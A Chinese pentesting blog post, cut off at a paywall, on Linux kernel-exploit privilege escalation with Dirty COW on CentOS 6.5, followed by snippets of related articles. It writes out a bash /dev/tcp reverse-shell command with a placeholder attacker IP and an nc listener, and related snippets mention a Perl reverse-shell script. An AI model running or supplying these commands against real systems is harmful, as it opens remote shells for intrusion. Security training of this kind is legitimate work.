内网渗透之——linux本地漏洞提权之——溢出提权

最新推荐文章于 2025-05-20 14:42:05 发布
最新推荐文章于 2025-05-20 14:42:05 发布
阅读量1.2k 收藏 3
点赞数 6
CC 4.0 BY-SA版权
分类专栏: 渗透测试(内网渗透)
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/wsnbbz/article/details/104782841

利用系统内核提权漏洞基本思路

1.判断系统版本
    uname -a   (Linux查看操作系统内核信息) 
    cat /proc/version (Linux查看当前操作系统版本信息) 
    cat /etc/issue  或cat /etc/redhat-release(Linux查看版本当前操作系统发行版信息)

2.根据内核版本去找对应的exp

3.获取交互式shell(反弹端口)

bash -i >& /dev/tcp/自己的ip/自己的端口 0>&1

4.交互式shell里上传exp并编译
上传路径:/tmp(可读可写可执行目录)

实例:利用centos6.5复现脏牛漏洞(CVE-2016-5195)

1.查看内核版本,符合脏牛使用条件>2.6.2

2.获取交互式shell(反弹端口),菜刀虚拟终端输入命令:bash -i >& /dev/tcp/自己的ip/自己的端口 0>&1,nc输入nc.exe -lvvp 端口进行监听,之后会将shell弹出

3.用菜刀上传exp(dirty.c)到tmp文件

最低0.47元/天 解锁文章
[升] Linux — 系统内核溢出漏洞
Blue17 の 小窝
02-05 1674
注意:很容易让系统崩溃,所以如果是测试的话,前最好做好系统备份。Linux 系统内核溢出漏洞与之前的Windows 内核溢出漏洞原理都差不多,都是通过内核漏洞进行的,内核漏洞一般都是专门研究这些的专家发现的,我们这些小卡拉米会用就行了(后面自学一下也未尝不可)。利用内核漏洞进行的基本流程如下:对目标系统进行信息收集,获取到系统内核信息以及版本信息。根据内核版本获取其对应的漏洞以及 EXP。使用找到的 EXP 对目标系统发起攻击,完成操作。
内网渗透--linux
hee_mee的博客
07-28 585
zeroNIl
linux溢出
weixin_30410119的博客
03-17 231
先在网站目录上传1.pl,是个反弹脚本Phpshell执行chmod +x 1.pl,给1.pl执行限,图0 然后执行 ./1.pl 本机IP 1224接着本机监听nc -vv -l -p 1224,图1 反弹成功 输入idbash-3.2$ iduid=529(zeicom) gid=525(zeicom) groups=525(zeicom)bash-3.2$这里uid=529(...
黑客在Linux系统下的20种主要姿势!(非常详细)从零基础到精通,收藏这篇就够了!
最新发布
Libra1313的博客
05-20 1112
下面这20种姿势,从入门到入土,看完保证你对Linux的“爱”更深沉。黑客利用竞争条件,直接往只读内存里写东西,想想都刺激。,Docker容器限,Redis认证,MySQL的UDF…因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取。因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取。因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取。因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取。:sudo缓冲区溢出,密码都不用输,直接root。组件的双重释放漏洞,释放了又释放,刺激不?
内网渗透Linux升大法
薛定谔嘚喵博客
11-24 320
本文主要介绍Linux升:定时任务、环境变量、SUID、SUDO、内核溢出
渗透—— Linux系统
爱国小白帽
03-11 2293
目录实验环境漏洞版本对照表模拟实验1、配置环境2、开始 实验环境 CentOS 6.5 lamp 菜刀 瑞士军刀nc 漏洞版本对照表 CVE-2017-1000367  [Sudo] (Sudo 1.8.6p7 - 1.8.20) CVE-2017-7494  [Samba Remote execution] (Samba 3.5.0-4.6.4/4.5.10/4.4.14) C...
内网渗透之——mysql数据库权之——UDF
wsnbbz的博客
03-11 2077
介绍 UDF是mysql的一个拓展接口,UDF(Userdefined function)可翻译为用户自定义函数,这个是用来拓展Mysql的技术手段。 原理 UDF可以理解为MySQL的函数库,可以利用UDF定义创建函数(其中包括了执行系统命令的函数),要想利用udf,必须上传udf.dll作为udf的执行库,mysql中支持UDF扩展 ,使得我们可以调用DLL里面的函数来实现一些特殊的功能...
内网渗透之——windows权之——利用第三方软件Filezilla
wsnbbz的博客
03-12 1441
介绍 FileZilla是一个免费开源的FTP软件,分为客户端版本和服务器版本,具备所有的FTP软件功能。可控性、有条理的界面和管理多站点的简化方式使得Filezilla客户端版成为一个方便高效的FTP客户端工具,而FileZilla Server则是一个小巧并且可靠的支持FTP&SFTP的FTP服务器软件 Filezilla和普通Web网站一样,前台有普通FTP账户执行上传、下载、删除...
内网渗透之——数据压缩、传输
01-09
Linux 直接使用tar命令压缩 windows 利用Rar.exe(winrar.exe里的执行文件) 参数说明: a 添加文件到压缩文件中 -k 锁定压缩文件 -s产生固体存档,这样可以增大压缩比 -r包括子目录 -m 设置压缩比  -m0 存储 添加到...
内网渗透-Linux内网渗透
lza20001103的博客
04-14 2587
内网渗透-Linux内网渗透
Windows系统内核溢出漏洞
渗透之路,攻防之间皆学问
03-08 2279
利用系统溢出漏洞进行的关键是通过查看系统的补丁信息来找寻缺失的、可以利用来的补丁进行
linux溢出(适合刚学习linux的朋友)
fengling132的专栏
03-31 2508
本帖最后由 wjs 于 2010-4-3 14:26 编辑  作者wjs qq 825680101 我也是刚接触linux,谢谢师傅sunwear的指导。 先在网站目录上传1.pl,是个反弹脚本 Phpshell执行chmod +x 1.pl,给1.pl执行限,图0 然后执行 ./1.pl 本机IP 1224 然后本机监听nc -vv -l -p
系统内核溢出漏洞
weixin_46104215的博客
11-28 3880
系统内核溢出漏洞是一种通用的的方法,攻击者通常可以使用该方法绕过系统的所有安全限制。攻击者利用该漏洞的关键是目标系统没有及时安装补丁。 存在局限性:如果目标系统的补丁更新工作较为迅速和完善,那么攻击者要想通过这种方法,就必须找出目标系统中的 0day漏洞 存在四种发现缺少补丁方法 方法一:手动执行命令 先获取目标系统的一个普通用户的shell(common shell), ...
渗透测试-Liinux
LCW991207的博客
09-24 829
呕心沥血6个小时写成:非漏洞(suid,sudo,NFS,PATH,LD_PRELOAD,Cron,DOCKER,LXD)漏洞Linux内核漏洞
操作系统升(三)之Windows系统内核溢出漏洞
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
01-30 1721
溢出是指攻击者利用系统本身或系统中软件的漏洞来获取 Windows操作系统System限,其中溢出又分为远程溢出本地溢出。远程溢出需要与远程服务器建立连接,然后根据系统漏洞使用相应的溢出程序获取远程服务器的 Windows操作系统Systen限。本地溢出是主流的方式,通常需要向服务器上传本地溢出程序,然后在服务器执行,如果系统存在漏洞,那么将会溢出获得 Windows操作系统System限。
内网安全—Windows系统内核溢出漏洞
wangluoanquan111的博客
03-07 964
第一种是报网络安全专业,现在叫网络空间安全专业,主要专业课程:程序设计、计算机组成原理原理、数据结构、操作系统原理、数据库系统、 计算机网络、人工智能、自然语言处理、社会计算、网络安全法律法规、网络安全、内容安全、数字取证、机器学习,多媒体技术,信息检索、舆情分析等。第二种是自学,就是在网上找资源、找教程,或者是想办法认识一-些大佬,抱紧大腿,不过这种方法很耗时间,而且学习没有规划,可能很长一段时间感觉自己没有进步,容易劝退。如果你对网络安全入门感兴趣,那么你需要的话可以点击这里第三种就是去找培训。
linux溢出后,运行了恶意进程.2longbak/longbak的临时处理办法。
charliemunger的博客
12-19 1797
linux恶意进程longbak处理20191218发现问题目前的解决办法 20191218发现问题 1、任意用户登录后,会自动创建进程.2longbak,且不断吃掉cpu资源。 2、杀掉后,登录还有,发现是做了crontab,且无法修改。 3、无法删除/usr/bin/longba程序,拷贝新chattr,更改属性删除/usr/bin/longbak后,几秒后立刻又出现。 4、发现有栈溢出...
linux
qq_42307546的博客
04-13 3209
常用命令 uname -a #查看内核/操作系统/cpu信息 hend -n 1 /etc/issue #查看操作系统版本 cat /proc/version #查看系统信息 hostname #查看计算机名 env #查看环境变量 ifconfig #查看网卡 netstat -lntp # 查看所有监听端口 netstat -antp # 查看所有已经建立的连接 netstat -s # 查看网络统计信息 iptables -L #查看防火墙设置 route -n # 查看路由表 ps -ef # 查.
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值